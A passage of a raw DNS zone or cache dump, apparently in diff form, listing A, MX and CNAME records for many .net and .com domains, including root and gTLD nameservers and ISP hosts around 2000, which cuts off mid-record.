+vh80040 IN A 209.97.59.245 +vh80167 IN A 209.97.57.116 +$ORIGIN vh4.INFI.net. +vh40099 IN A 209.97.59.121 +$ORIGIN SCRUZ.net. +NS2 IN A 165.227.2.10 +NS IN A 165.227.1.1 +$ORIGIN HINET.net. +netnews IN A 168.95.195.16 + IN MX 0 netnews.hinet.net. +HNTP1 IN A 168.95.192.1 +HNTP3 IN A 168.95.192.2 +DNS IN A 168.95.1.1 +$ORIGIN reedmedia.net. +ns2 IN A 209.241.86.6 +NS1 IN A 63.145.197.178 +$ORIGIN schnism.net. +ns IN A 195.88.150.3 +$ORIGIN unlisys.net. +mail IN A 195.21.255.252 +$ORIGIN AIC.net. +NS IN A 195.250.64.65 +$ORIGIN PIPEX-SZ.net. +NS IN A 196.15.232.19 +$ORIGIN DOMAINNT.net. +DENEB IN A 207.211.220.90 +RIGEL IN A 212.0.205.5 +VEGA IN A 209.26.120.5 +POLARIS IN A 209.26.120.2 +ANTARES IN A 209.26.120.3 +$ORIGIN GUERNSEY.net. +DNS2 IN A 195.226.128.3 +$ORIGIN usa.net. +CNDVG001 IN A 165.212.12.1 +$ORIGIN OPS.usa.net. +dns03 IN A 204.68.24.136 +DNS01 IN A 204.68.24.137 +$ORIGIN INR.net. +NS2 IN A 198.77.208.3 +NS1 IN A 198.77.208.2 +$ORIGIN CP.MSFT.net. +dns6 IN A 207.46.138.20 +DNS4 IN A 207.46.138.11 +dns7 IN A 207.46.138.21 +dns IN A 207.46.138.10 +DNS5 IN A 207.46.138.12 +$ORIGIN UK.MSFT.net. +DNS4 IN A 213.199.144.152 +DNS3 IN A 213.199.144.151 +$ORIGIN TK.MSFT.net. +DNS2 IN A 207.46.232.38 +DNS1 IN A 207.46.232.37 +$ORIGIN HHS.net. +NS IN A 63.93.136.29 +$ORIGIN NEWACCOUNT.net. +NS IN A 216.121.96.26 +$ORIGIN PBI.net. +NS2 IN A 206.13.29.11 +NS1 IN A 206.13.28.11 +$ORIGIN timeheart.net. +ns1 IN A 63.197.231.203 +$ORIGIN TOSA.TWTELECOM.net. +INS2 IN A 204.95.160.4 +INS1 IN A 204.95.160.2 +$ORIGIN zama.net. +NS2 IN A 203.142.130.5 +NS1 IN A 203.142.130.4 +$ORIGIN MINDLINK.net. +GIANT IN A 204.174.18.2 +DEEP IN A 204.174.16.4 +$ORIGIN SER.BBNPLANET.net. +KNOCK IN A 192.239.16.129 +$ORIGIN MEDIASERVICES.net. +NS2 IN A 64.65.16.237 +NS IN A 64.65.15.147 +$ORIGIN KOLO.net. +NS IN A 209.66.103.20 +$ORIGIN SEYCHELLES.net. +NS1 IN A 202.84.235.33 +$ORIGIN BT.net. +NS0 IN A 194.72.6.51 +$ORIGIN JERKY.net. +NS1 IN A 204.57.55.100 +$ORIGIN CN.net. 
+DNS2 IN A 202.97.18.61 +NS1 IN A 202.97.7.17 +NS IN A 202.97.16.195 +$ORIGIN runway.CN.net. +ns IN A 211.101.132.8 +$ORIGIN APNIC.net. +SVC00 IN A 202.12.28.131 +TECKLA IN A 202.12.28.129 +NS IN A 203.37.255.97 +$ORIGIN BELLSOUTH.net. +NS IN A 205.152.0.5 +$ORIGIN ATL.BELLSOUTH.net. +NS IN A 205.152.0.20 +$ORIGIN CL.BELLSOUTH.net. +NS2 IN A 205.152.16.8 +NS3 IN A 205.152.32.8 +$ORIGIN MIA.BELLSOUTH.net. +NS IN A 205.152.16.20 +$ORIGIN RDU.BELLSOUTH.net. +NS IN A 205.152.32.20 +$ORIGIN 163.net. +SHNS IN A 61.129.65.108 +BJNS IN A 202.108.255.202 +NS IN A 202.108.255.201 +$ORIGIN ca.us.ibm.net. +ns02 IN A 165.87.201.243 +ns01 IN A 165.87.201.244 +$ORIGIN ny.us.ibm.net. +ns01 IN A 165.87.194.244 +$ORIGIN CP.net. +NS3 IN A 209.228.14.4 +NS1 IN A 209.228.15.4 +$ORIGIN tallship.net. +falcon IN A 208.179.112.2 +condor IN A 12.28.140.20 +nomad IN A 204.107.129.2 +satan IN A 204.107.129.3 +rectum IN A 204.107.129.10 +$ORIGIN ns.tmcs.net. +b IN A 209.104.33.252 +c IN A 209.104.39.252 +a IN A 209.104.63.252 +$ORIGIN pshift.net. +mail IN A 208.153.85.30 +$ORIGIN CTCCOM.net. +NS4 IN A 64.69.100.35 +NS3 IN A 64.69.100.67 +$ORIGIN cid.net. +bofh IN A 212.172.21.254 +$ORIGIN PIPEX.net. +NS0 IN A 158.43.128.8 +NS1 IN A 158.43.192.7 +$ORIGIN DNS.PIPEX.net. +NS1-Y IN A 158.43.193.89 +NS0-Y IN A 158.43.129.89 +$ORIGIN SOTELMA.net. +DOGON IN A 208.144.230.1 +CIWARA IN A 208.144.230.2 +$ORIGIN DK.net. +NS IN A 193.88.44.42 +$ORIGIN HIGGS.net. +ns2 IN A 204.80.125.145 +ns3 IN A 204.80.101.94 +ns IN A 204.80.101.90 +ns1 IN A 204.80.125.130 +PINE IN A 204.80.125.130 +$ORIGIN E-SYNC.net. +NS2 IN A 192.206.57.128 +NS1 IN A 192.206.57.127 +$ORIGIN ABOVE.net. +NS3 IN A 207.126.105.146 +NS IN A 207.126.96.162 +$ORIGIN COBEX.net. +NS2 IN A 207.102.129.72 +NS1 IN A 207.102.129.71 +$ORIGIN NEO.net. +NS2 IN A 206.109.7.65 +NS IN A 206.109.1.1 +$ORIGIN AFRIQ.net. +BAABEN IN A 165.231.1.3 +NEENE IN A 165.231.1.2 +$ORIGIN CW.net. 
+NS4 IN A 204.70.49.234 +NS2 IN A 204.70.57.242 +NS3 IN A 204.70.25.234 +NS IN A 204.70.128.1 +$ORIGIN hactrn.net. +NS IN A 216.254.68.12 +$ORIGIN QUASAR.net. +NS1 IN A 199.166.31.3 +$ORIGIN VERMONTLAW.net. +NS1 IN A 63.89.26.15 +NS IN A 63.89.26.16 +$ORIGIN ICP.net. +ICM1 IN A 192.94.207.66 +$ORIGIN wetlogic.net. +athome IN CNAME c1059495-a.snvl1.sfba.home.com. +$ORIGIN NY.ALTER.net. +New-York4 IN A 137.39.126.10 + IN A 137.39.2.3 +$ORIGIN pccf.net. +proxy IN A 205.189.73.123 +$ORIGIN IS-FUN.net. +NS4 IN A 212.162.54.34 +$ORIGIN GUA.net. +OSI2 IN A 205.161.188.3 +$ORIGIN 2GLOBE.net. +TERMINAL IN A 195.178.183.230 +NS IN A 195.178.183.200 +$ORIGIN SYS.GTEI.net. +DNSAUTH2 IN A 4.2.49.3 +DNSAUTH3 IN A 4.2.49.4 +DNSAUTH1 IN A 4.2.49.2 +$ORIGIN SPEAKEASY.net. +NS2 IN A 216.231.41.22 +NS1 IN A 216.254.0.9 +$ORIGIN PSI.net. +NS2 IN A 38.8.50.2 +$ORIGIN DNS.UK.PSI.net. +SEC1 IN A 154.32.105.34 +$ORIGIN ray.net. +ns1 IN A 195.238.228.131 +$ORIGIN anycast.net. +ns1 IN A 216.196.51.4 +$ORIGIN EP.net. +FLAG IN A 198.32.4.13 +$ORIGIN SR.net. +NS2 IN A 200.1.156.11 +NS1 IN A 200.1.157.10 +$ORIGIN IPTEK.net. +CADDSYS IN A 202.46.1.2 +$ORIGIN NIC.XLINK.net. +DNS IN A 193.141.40.42 +$ORIGIN NURSAT.net. +NS2 IN A 212.13.167.1 +NS IN A 194.226.128.1 +$ORIGIN 188.net. +smtp IN A 202.96.125.104 +mx2 IN A 202.96.125.101 +ns2 IN A 202.103.134.4 +mx1 IN A 202.96.125.100 +NS IN A 202.96.125.106 +$ORIGIN KORNET.net. +NS IN A 168.126.63.1 +$ORIGIN CCSRS.net. +NS2 IN A 206.253.214.73 +NS1 IN A 209.237.73.73 +$ORIGIN EU.net. +NS IN A 192.16.202.11 +$ORIGIN USSR.EU.net. +NS IN A 193.124.22.65 +$ORIGIN RELCOM.EU.net. +NS IN A 193.124.23.3 +$ORIGIN AUSTRIA.EU.net. +NS IN A 192.92.138.35 +NS3 IN A 193.154.160.110 +$ORIGIN hypa.net. +ns2 IN A 63.160.181.11 +ns1 IN A 63.160.181.10 + IN A 209.166.167.208 +$ORIGIN IDT.net. +NS IN A 198.4.75.100 +$ORIGIN NS.IDT.net. +AUTH2 IN A 169.132.133.1 +$ORIGIN ROOT-SERVERS.net. 
+A IN A 198.41.0.4 +B IN A 128.9.0.107 +C IN A 192.33.4.12 +D IN A 128.8.10.90 +E IN A 192.203.230.10 +F IN A 192.5.5.241 +G IN A 192.112.36.4 +H IN A 128.63.2.53 +I IN A 192.36.148.17 +$ORIGIN I-DNS.net. +D IN A 211.169.245.170 +B IN A 208.184.25.199 +F IN A 216.200.119.128 +E IN A 202.160.253.152 +C IN A 210.189.254.50 +A IN A 208.184.174.7 +$ORIGIN US.PRSERV.net. +NS4 IN A 165.87.201.244 +NS1 IN A 165.87.194.244 +NS3 IN A 165.87.201.243 +$ORIGIN U-NET.net. +NS0 IN A 194.119.128.65 +NS1 IN A 194.119.128.66 +$ORIGIN HS0.U-NET.net. +NS0 IN A 194.119.128.70 +NS1 IN A 194.119.128.71 +$ORIGIN ULTRADNS.net. +UDNS2 IN A 204.74.101.1 +UDNS1 IN A 204.69.234.1 +$ORIGIN WEBMAGIC.net. +NS2 IN A 64.168.49.66 +NS1 IN A 209.119.182.2 +$ORIGIN HOST4U.net. +NS2 IN A 209.150.129.3 +NS IN A 209.150.128.30 +$ORIGIN RCCN.net. +DNS IN A 193.136.7.17 +$ORIGIN valley.net. +lebanon IN A 198.115.160.16 +NS2 IN A 198.115.160.16 +DNS IN A 198.115.160.10 +$ORIGIN primary.net. +dns2 IN A 205.242.187.235 +NS2 IN A 205.242.176.103 +dns1 IN A 205.242.187.234 +NS1 IN A 205.242.92.2 +$ORIGIN SQUONK.net. +NS2 IN A 63.84.12.135 +NS1 IN A 63.84.12.133 +$ORIGIN IP-PLUS.net. +NS1 IN A 164.128.36.34 +$ORIGIN TECHNOLOGIA.net. +NS2 IN A 207.253.59.4 +NS1 IN A 207.253.214.199 +NS3 IN A 195.115.180.67 +$ORIGIN VI.net. +NS2 IN A 212.78.64.10 +NS1 IN A 194.88.77.1 +$ORIGIN ISLES.net. +RS IN A 212.100.224.90 +$ORIGIN SOVER.net. +time IN CNAME garnet.sover.net. +mqueue IN A 209.198.87.52 +etrn IN A 209.198.87.58 +garnet IN A 209.198.87.53 +MAPLE IN A 209.198.87.41 +CLOVER IN A 209.198.87.40 +mail IN A 209.198.87.53 + IN A 209.198.87.34 +mqueue0 IN A 209.198.87.52 +$ORIGIN ACT2000.net. +ACT2 IN A 207.42.132.227 +ACT1 IN A 207.42.132.226 +$ORIGIN AKADNS.net. +ZA IN A 209.185.188.39 +ZB IN A 216.32.65.105 +ZC IN A 204.178.107.227 +ZD IN A 204.178.110.67 +ZE IN A 216.200.14.118 +ZF IN A 208.5.85.132 +ZG IN A 206.132.160.36 +ZH IN A 63.208.48.42 +$ORIGIN NS.ESAT.net. +NS3 IN A 192.111.39.100 +$ORIGIN THEPLANET.net. 
+EARTH IN A 195.92.195.222 +PLUTO IN A 194.207.6.30 +VENUS IN A 194.152.65.222 +$ORIGIN UU.net. +uunet IN MX 10 Mail.uu.net. +external-mail-router IN A 198.5.241.39 + IN A 198.5.241.38 + IN A 198.5.241.40 +NS IN A 137.39.1.3 +$ORIGIN NS.DE.UU.net. +AUTH03 IN A 192.76.144.16 +$ORIGIN NS.UU.net. +AUTH100 IN A 198.6.1.202 +AUTH00 IN A 198.6.1.65 +AUTH02 IN A 198.6.1.82 +AUTH03 IN A 198.6.1.83 +AUTH60 IN A 198.6.1.181 +AUTH61 IN A 198.6.1.182 +AUTH110 IN A 198.6.1.114 +AUTH50 IN A 198.6.1.161 +AUTH51 IN A 198.6.1.162 +$ORIGIN PIONEERNET.net. +DNS2 IN A 208.240.196.10 +DNS1 IN A 208.240.196.9 +$ORIGIN HOME.net. +NS2 IN A 24.2.0.27 +NS1 IN A 24.0.0.27 +$ORIGIN QUANTIFIED.net. +NS2 IN A 63.212.171.3 +NS1 IN A 63.212.171.2 +$ORIGIN SECURE.net. +NS2 IN A 161.58.9.10 +NS1 IN A 192.41.1.10 +$ORIGIN DSL.net. +NS2 IN A 209.87.79.232 +NS1 IN A 209.87.64.70 +$ORIGIN JA.net. +NS0 IN A 128.86.1.20 + IN A 193.63.94.20 +$ORIGIN ULCC.JA.net. +NOC IN A 193.63.94.25 +$ORIGIN CINE.net. +NS2 IN A 207.168.250.12 +$ORIGIN ANS.net. +NS-02B IN A 207.24.245.178 +NS-01B IN A 199.221.47.8 +NS-02A IN A 207.24.245.179 +NS-01A IN A 199.221.47.7 +$ORIGIN OAR.net. +NS2 IN A 192.88.195.10 +NS1 IN A 192.88.193.144 +$ORIGIN MAHNET.net. +NS2 IN A 207.219.173.132 +NS1 IN A 24.69.168.121 +$ORIGIN NCREN.net. +REGGAE IN A 128.109.131.3 +NCNOC IN A 192.101.21.1 +$ORIGIN AMERICA.net. +AUTH2 IN A 209.17.197.18 +AUTH1 IN A 209.17.197.2 +$ORIGIN EXODUS.net. +NS2 IN A 207.82.198.150 +NS IN A 206.79.230.10 +NS3 IN A 206.79.240.13 +$ORIGIN NJ.EXODUS.net. +NS2 IN A 209.1.10.234 +NS IN A 206.79.7.50 +$ORIGIN DOUBLECLICK.net. 
+uunymdgds1 IN A 206.65.183.21 +dcnymdgds1 IN A 204.253.104.202 +exnjmdgds1 IN A 209.67.38.22 +dcnyadgds1 IN A 204.253.104.11 +bbvamdgds1 IN A 128.11.60.75 +exnjadgds1 IN A 209.67.38.48 +annyadgds1 IN A 208.184.29.250 +annyadgds2 IN A 208.184.29.252 +cwvamdgds1 IN A 205.138.3.240 +uucamdgds1 IN A 204.178.112.124 +cwvaadgds1 IN A 205.138.3.242 +spnjadgds1 IN A 208.32.211.70 +cwvaadgds2 IN A 205.138.3.243 +ctukadgds1 IN A 213.86.246.20 +tlseadgds1 IN A 194.237.107.6 +uusjmdgds1 IN A 204.176.177.20 +uuvamdgds1 IN A 204.178.112.168 +$ORIGIN DCNY.DOUBLECLICK.net. +NS2 IN A 204.253.104.10 +NS1 IN A 208.211.225.10 +$ORIGIN UUSJ.DOUBLECLICK.net. +NS1 IN A 204.176.177.10 +$ORIGIN CWVA.DOUBLECLICK.net. +NS1 IN A 205.138.3.20 +$ORIGIN DSO.net. +NS2 IN A 206.16.77.11 +NS1 IN A 206.16.77.10 +$ORIGIN GIP.net. +NS2 IN A 204.59.1.222 +NS1 IN A 204.59.144.222 +NS3 IN A 204.59.64.222 +$ORIGIN AMNIC.net. +NS IN A 195.250.64.90 +$ORIGIN TELSTRA.net. +NS1 IN A 139.130.4.5 +$ORIGIN ELI.net. +NS2 IN A 207.173.86.2 +NS IN A 209.63.0.2 +$ORIGIN TWNIC.net. +NS IN A 192.83.166.11 +$ORIGIN BAHNHOF.net. +NS2 IN A 212.85.64.4 +NS1 IN A 195.178.160.2 +$ORIGIN ivm.net. +ns1 IN A 62.204.1.1 +$ORIGIN BEACHSHORE.net. +NS1 IN A 199.166.31.250 +$ORIGIN TDS.net. +NS IN A 204.246.1.20 +$ORIGIN FIRSTWORLD.net. +NS4 IN A 216.7.160.162 +NS2 IN A 216.127.92.78 +NS1 IN A 216.7.160.75 +NS3 IN A 216.7.160.161 +$ORIGIN centralinfo.net. +ns2 IN A 63.102.204.130 +ns1 IN A 63.102.200.2 +$ORIGIN NOC.NULLUS.net. +NS2 IN A 63.119.253.254 +NS3 IN A 63.168.101.254 +NS1 IN A 209.136.161.254 +$ORIGIN FREE.net. +NS1 IN A 147.45.15.34 +$ORIGIN mediaone.net. +NS1 IN A 24.128.1.80 +NS2 IN A 24.128.1.81 +$ORIGIN MW.mediaone.net. +NS1 IN A 24.131.1.8 +$ORIGIN JVNC.net. +NISC IN A 128.121.50.7 +$ORIGIN NS.NYC1.GLOBIX.net. +Z1 IN A 209.10.66.55 +$ORIGIN NS.LHR1.GLOBIX.net. +Z1 IN A 212.111.32.38 +$ORIGIN NS.SJC1.GLOBIX.net. +Z1 IN A 209.10.34.55 +$ORIGIN akamaitech.net. 
+za IN A 204.178.107.226 +n6g IN A 216.52.121.175 +ZB IN A 128.11.47.240 +n2g IN A 216.52.56.47 +ZC IN A 216.32.65.14 +ZD IN A 38.144.120.147 +n5g IN A 216.52.56.33 +ZE IN A 216.200.14.134 +n1g IN A 216.52.56.36 +ZF IN A 204.178.110.73 +n8g IN A 216.52.56.33 +ZG IN A 209.185.188.14 +n4g IN A 216.52.56.33 +ZH IN A 213.161.66.165 +n0g IN A 216.52.56.33 +n7g IN A 216.52.196.5 +n3g IN A 216.52.56.48 +$ORIGIN THNIC.net. +NS-AIT IN A 192.41.170.219 +NS IN A 202.28.0.1 +$ORIGIN connriver.net. +mailer IN A 63.93.137.13 +ns2 IN A 208.240.246.5 +netserver IN A 204.249.74.100 +$ORIGIN IT.net. +DNS2 IN A 151.1.2.1 +DNS IN A 151.1.1.1 +$ORIGIN D4P.net. +foolusmf IN CNAME a100.g.akamai.net. +$ORIGIN LUCKY.net. +NS IN A 193.193.193.100 +$ORIGIN SENET.net. +NS IN A 206.155.163.195 +$ORIGIN RIPE.net. +NS IN A 193.0.0.193 +$ORIGIN ADELPHIA.net. +NS2 IN A 24.48.62.35 +NS3 IN A 208.239.78.134 +NS1 IN A 24.48.43.3 +$ORIGIN cdp.ADELPHIA.net. +mx1 IN A 24.48.58.221 +$ORIGIN buf.ADELPHIA.net. +mx1 IN A 24.48.36.10 +$ORIGIN INTERNIC.net. +NS2 IN A 198.41.0.11 +$ORIGIN UNDPBI.TELEPAC.net. +SOL IN A 194.65.87.2 +$ORIGIN KRNIC.net. +NS1 IN A 202.30.50.51 +NS IN A 202.30.50.50 +$ORIGIN UNI2.net. +NS2 IN A 195.82.195.99 +NS IN A 129.142.7.99 +$ORIGIN GTLD-SERVERS.net. +K IN A 213.177.194.5 +A IN A 198.41.3.38 +B IN A 203.181.106.5 +M IN A 202.153.114.101 +C IN A 205.188.185.18 +D IN A 208.206.240.5 +E IN A 207.200.81.69 +F IN A 198.17.208.67 +G IN A 198.41.3.101 +I IN A 192.36.144.133 +J IN A 210.132.100.101 +$ORIGIN dns.swip.net. +kista IN A 192.71.220.9 +$ORIGIN RCPIP.net. +EKEKO IN A 209.45.127.2 +$ORIGIN UNA.net. +ENGINE1 IN A 208.136.52.74 +$ORIGIN hcr.net. +ns IN A 208.240.246.4 +$ORIGIN NSIREGISTRY.net. +NS2 IN A 198.41.3.108 +$ORIGIN SUBTEND.net. +NAVI IN A 208.186.117.224 +NS1 IN A 208.186.117.71 +$ORIGIN IAD.GBLX.net. +NAME IN A 204.152.166.155 +$ORIGIN PHX.GBLX.net. +NAME IN A 206.165.6.10 +$ORIGIN ROC.GBLX.net. +NAME IN A 209.130.187.10 +$ORIGIN SHOREHAM.net. 
+pop IN CNAME shoreham.net. +$ORIGIN GREENMOUNTAINACCESS.net. +NS2 IN A 208.144.252.31 +NS1 IN A 208.144.252.30 +$ORIGIN MINDSPRING.net. +SCRATCHY IN A 207.69.200.211 +ITCHY IN A 207.69.200.210 +$ORIGIN RIPN.net. +NS2 IN A 195.209.0.6 +NS IN A 194.85.119.1 +$ORIGIN CWCI.net. +NS0 IN A 194.6.79.162 +$ORIGIN GBMTECH.net. +NS2 IN A 208.243.164.3 +NS1 IN A 208.243.164.2 +$ORIGIN vrx.net. +pedic-med IN A 199.166.24.2 +ns2 IN A 65.196.80.102 +ns3 IN A 199.166.24.3 +ns1 IN A 199.166.24.1 + IN A 216.13.76.2 +$ORIGIN globalnetisp.net. +NS2 IN A 207.136.213.2 +NS1 IN A 207.136.213.1 +$ORIGIN MYNET.net. +FAITH IN A 207.13.11.2 +$ORIGIN ADNS.net. +NS2 IN A 199.5.157.3 +KOVU IN A 199.5.157.52 +NS1 IN A 199.5.157.2 +$ORIGIN DIEBOLD.net. +NS1 IN A 65.196.80.10 +$ORIGIN JPS.net. +NS2 IN A 216.224.156.252 +NS1 IN A 216.119.0.192 +$ORIGIN NETNAMES.net. +NS2 IN A 212.53.77.28 +NS1 IN A 212.53.64.60 +$ORIGIN RIO.net. +ORSTOM IN A 192.33.151.1 +$ORIGIN com. +sherickpm IN MX 10 inbound.sherickpm.com.criticalpath.net. +ultradevices IN A 209.249.61.20 +verisign IN A 205.139.94.60 +vermontel IN A 204.164.106.2 + IN MX 0 pop.vermontel.net. +TOPICA IN A 206.132.75.196 +unknown IN A 168.143.148.168 +vietmercury IN A 207.1.134.34 +moonmothers IN A 24.218.253.157 + IN MX 10 costorf.ne.mediaone.net. +vhv IN MX 0 mail.vhv.com. +BURSTNET IN MX 15 mail.ar.com. + IN MX 5 ibd.ar.com. +velco IN A 207.217.96.41 + IN A 207.217.96.42 + IN A 207.217.96.43 + IN A 207.217.96.44 + IN A 207.217.96.45 + IN A 207.217.96.28 + IN A 207.217.96.29 + IN A 207.217.96.30 + IN A 207.217.96.31 + IN A 207.217.96.32 + IN A 207.217.96.33 + IN A 207.217.96.34 + IN A 207.217.96.35 + IN A 207.217.96.36 + IN A 207.217.96.37 + IN A 207.217.96.38 + IN A 207.217.96.39 + IN A 207.217.96.40 + IN MX 10 mail.velco.com. +ffic IN A 64.84.58.128 + IN MX 5 mail.mailconnect.com. +overstock IN A 64.78.130.251 +madriver IN MX 10 bend.madriver.com. +catic1 IN MX 10 Mail.catic1.com. + IN MX 20 smtp-Relay.CTCCom.net. 
+goldstats IN A 66.33.12.17 +nominum IN A 204.152.184.170 +hill IN A 208.162.106.6 + IN MX 20 mail.hill.com. +garmontusa IN MX 20 mail.garmontusa.com. +bt IN A 62.7.244.127 +xraylitho IN MX 10 mail.sover.net. + IN MX 20 mqueue.sover.net. +glaxowellcome IN MX 10 firewall1.glaxowellcome.com. + IN MX 10 firewall3.glaxowellcome.com. +nova-data IN A 64.70.144.14 + IN MX 10 mail.nova-data.com. +AVENUEA IN MX 100 mail2.louisdreyfus.co.uk. + IN MX 10 ldfwsvr2.l-dreyfus.com. + IN MX 50 ldfwsvr02-hme1.l-dreyfus.com. + IN MX 75 mail.louisdreyfus.co.uk. +best IN MX 10 mail1.best.com. + IN MX 10 mail2.best.com. + IN MX 20 mail3.best.com. + IN MX 20 mail4.best.com. +biketrack IN MX 20 mqueue.sover.net. + IN MX 10 mail.sover.net. +ilovedomain IN A 211.175.164.170 +symquest IN A 64.69.102.131 + IN MX 10 Quest-7.symquest.com. +QUEST-NET IN A 207.140.30.11 + IN MX 5 mail.quest-net.com. +cacheware IN A 209.128.82.20 +Algebra IN A 208.233.99.160 +gmcr IN A 12.34.108.130 + IN MX 10 gateway1.gmcr.com. +YAHOO IN A 216.115.108.243 + IN A 216.115.108.245 +ogud IN MX 90 smtp.elistx.com. + IN MX 10 mail.dc.ogud.com. +costorf IN A 24.218.253.157 + IN MX 10 costorf.ne.mediaone.net. +highmeadow IN A 207.136.209.6 + IN MX 10 hm6.vt.highmeadow.com. + IN MX 20 mqueue.sover.net. +broadsoft IN A 208.39.36.48 +cmates IN MX 10 popmail.u-net.com. +mt-mansfield IN A 208.153.85.16 + IN MX 10 mail.pshift.net. + IN MX 30 pomail.pshift.com. +skiinsurance IN MX 10 mail.skiinsurance.com. + IN MX 20 etrn.sover.net. +map IN A 206.98.40.150 +idx IN MX 30 isdev.idx.com. + IN MX 50 drawbridge.idx.com. + IN MX 10 idx.idx.com. + IN MX 20 bvtsweeper.idx.com. +msgbox IN A 216.71.82.42 +sleepycat IN A 192.41.61.122 +cisco IN A 198.133.219.25 + IN MX 10 proxy2.cisco.com. + IN MX 10 proxy3.cisco.com. + IN MX 20 proxy6.cisco.com. + IN MX 20 proxy9.cisco.com. + IN MX 10 proxy1.cisco.com. +TOAPLAN IN A 216.42.31.169 +hometownbands IN A 209.67.235.38 +smuggs IN MX 10 mail.smuggs.com. 
+clothncanvas IN A 208.153.85.16 + IN MX 10 mail.pshift.net. + IN MX 30 mail.pshift.com. +quantified IN A 63.212.171.4 +arabia IN A 216.251.232.40 +bostic IN A 199.103.241.218 +verisign-grs IN A 198.41.3.55 +gdarm IN MX 10 bvt-ext.gdarm.com. +retro IN A 205.179.181.194 + IN MX 10 gw.retro.com. + IN MX 20 www.retro.com. + IN MX 50 mail.scruznet.com. +vssg IN A 216.157.26.252 +jerusalem-mail IN A 216.251.232.93 + IN MX 10 mail.jerusalem-mail.com. +tfm IN MX 50 mtbaker.tfm.com. + IN MX 20 mailhost.tfm.com. +fratfunz IN A 216.226.16.150 +elektro IN A 192.188.133.3 +WonderWorks IN A 192.203.206.65 + IN MX 50 mail.wonderworks.com. +fiberia IN MX 10 webmail.fiberia.com. +tifosi IN MX 10 gutenberg.bucksnet.com. +ivillage IN A 209.185.162.150 +pwshift IN A 208.153.85.36 +goputney IN MX 10 mail.sover.net. + IN MX 20 mqueue.sover.net. +$ORIGIN IPNS.com. +NS2 IN A 63.230.183.1 +NS IN A 208.187.190.2 +$ORIGIN appliedtheory.com. +NS2 IN A 168.75.17.11 +NS1 IN A 204.168.28.9 +ns3 IN A 207.127.101.8 +$ORIGIN COMPUWARE.com. +nl IN MX 150 uucp.nl.net. + IN MX 50 bitbucket.extern.uniface.nl. + IN MX 100 smtp.nl.net. +$ORIGIN YOUR-DOMAIN.com. +NS2 IN A 216.167.31.177 +NS1 IN A 216.167.31.176 +$ORIGIN nortelnetworks.com. +NS-RCH IN A 192.135.215.2 +NS-OTT IN A 192.58.194.71 +ns-har IN A 192.100.101.3 +$ORIGIN SJMERCURY.com. +BAYONET IN A 207.1.134.34 +$ORIGIN excite.com. +NSE00 IN A 198.3.102.250 +NS00 IN A 198.3.98.250 +NSE01 IN A 198.3.102.251 +NS01 IN A 198.3.98.251 +$ORIGIN PLANET-THREE.com. +NS0 IN A 212.49.219.164 +$ORIGIN TOKYO.JP.NETDNS.com. +NS1 IN A 64.56.164.118 +$ORIGIN LONDON.UK.NETDNS.com. +NS1 IN A 212.62.6.38 +$ORIGIN SANFRANCISCO.US.NETDNS.com. +NS1 IN A 207.82.50.166 +$ORIGIN NEWYORK.US.NETDNS.com. +NS1 IN A 216.32.212.86 +$ORIGIN SEATTLE.US.NETDNS.com. +NS1 IN A 206.253.214.13 +$ORIGIN ARICATRA.com. +NS IN A 206.64.112.114 +$ORIGIN REGME.com. +NS1 IN A 207.153.57.14 +$ORIGIN ELISTX.com. +smtp IN A 209.116.252.130 +NS IN A 209.116.252.130 +$ORIGIN SIGMAHOSTING.com. 
+NS1 IN A 209.241.86.6 +$ORIGIN champcable.com. +CCC IN A 207.41.53.11 +$ORIGIN IAFRICA.com. +NS1 IN A 196.7.0.139 +NS3 IN A 196.7.0.137 +$ORIGIN dot-god.com. +A-GTLD-SERVERS IN A 205.189.73.123 +B-GTLD-SERVERS IN A 205.189.71.10 +$ORIGIN CONRADPROMOTIONS.com. +NS2 IN A 208.24.118.203 +NS1 IN A 208.158.96.118 +$ORIGIN onemain.com. +ns4 IN A 63.208.210.11 +NS2 IN A 166.90.148.68 +NS1 IN A 166.90.148.67 +ns3 IN A 63.208.210.10 +$ORIGIN SIMORGH.com. +NS1 IN A 209.1.163.10 +$ORIGIN Christ.com. +Yeshua IN A 207.54.4.5 +Abba IN A 63.229.15.59 +$ORIGIN TRAVELPHOTOCONTESTS.com. +www IN A 64.85.86.156 +$ORIGIN WEB2010.com. +NS4 IN A 216.157.55.6 +NS2 IN A 216.157.79.246 +NS3 IN A 216.157.47.6 +NS IN A 209.235.31.149 +$ORIGIN 2DAY.com. +NS2 IN A 202.89.128.74 +NS1 IN A 202.37.240.13 +NS3 IN A 209.240.128.25 +$ORIGIN NETSCAPE.com. +tdns-me1 IN A 205.188.247.67 +tdns-me2 IN A 205.188.247.68 +tdns2 IN A 207.200.77.53 +tdns3 IN A 207.200.73.72 +NS IN A 198.95.251.10 +NS2 IN A 207.200.73.80 +$ORIGIN WWEBSVS.com. +PAPPILLOMA IN A 209.233.37.10 +$ORIGIN vermontel.com. +ns1 IN A 204.164.106.2 +$ORIGIN LA.TIS.com. +RELAY IN A 198.51.22.11 +$ORIGIN MSEN.com. +DNS IN A 148.59.19.11 +$ORIGIN bungi.com. +DAVER IN A 206.14.228.2 + IN A 207.126.97.2 +max IN A 206.14.228.7 + IN A 207.126.97.7 +$ORIGIN SPEEDHOST.com. +NS2 IN A 216.42.31.169 +NS3 IN A 216.42.31.130 +$ORIGIN GPG.com. +NS2 IN A 209.1.163.50 +NS1 IN A 209.1.163.30 +$ORIGIN NL.CONCENTRIC.com. +NS1 IN A 195.18.114.5 +$ORIGIN SJC.LYCOS.com. +SJC-NS2 IN A 206.79.171.40 +SJC-NS1 IN A 206.79.171.39 +$ORIGIN BOS.LYCOS.com. +BOS-NS2 IN A 209.67.228.40 +BOS-NS1 IN A 209.67.228.39 +$ORIGIN TOPICA.com. 
+NS3 IN A 206.111.131.72 +ns-ext IN A 206.132.75.195 +inmta011 IN A 206.132.75.197 +inmta009 IN A 206.132.75.226 +dns IN A 206.111.131.72 +outmta004 IN A 206.132.75.201 +inmta001 IN A 206.132.75.197 + IN A 206.111.131.79 +inmta003 IN A 206.132.75.213 +outmta010 IN A 206.132.75.222 +inmta005 IN A 206.132.75.217 +NS1 IN A 206.132.75.195 +NS2 IN A 208.184.76.200 +$ORIGIN DOLEH.com. +NS IN A 204.255.25.63 +$ORIGIN BSDI.com. +NS IN A 207.174.116.8 +$ORIGIN NYTIMES.com. +GATEKEEPER IN A 199.181.175.201 +$ORIGIN GDGSC.com. +NS0 IN A 192.160.62.66 +NS2 IN A 204.162.124.66 +$ORIGIN EDIGITALS.com. +NS2 IN A 211.39.139.36 +NS3 IN A 211.175.164.170 +NS1 IN A 211.39.139.35 +$ORIGIN INTERNETSQUARE.com. +NS2 IN A 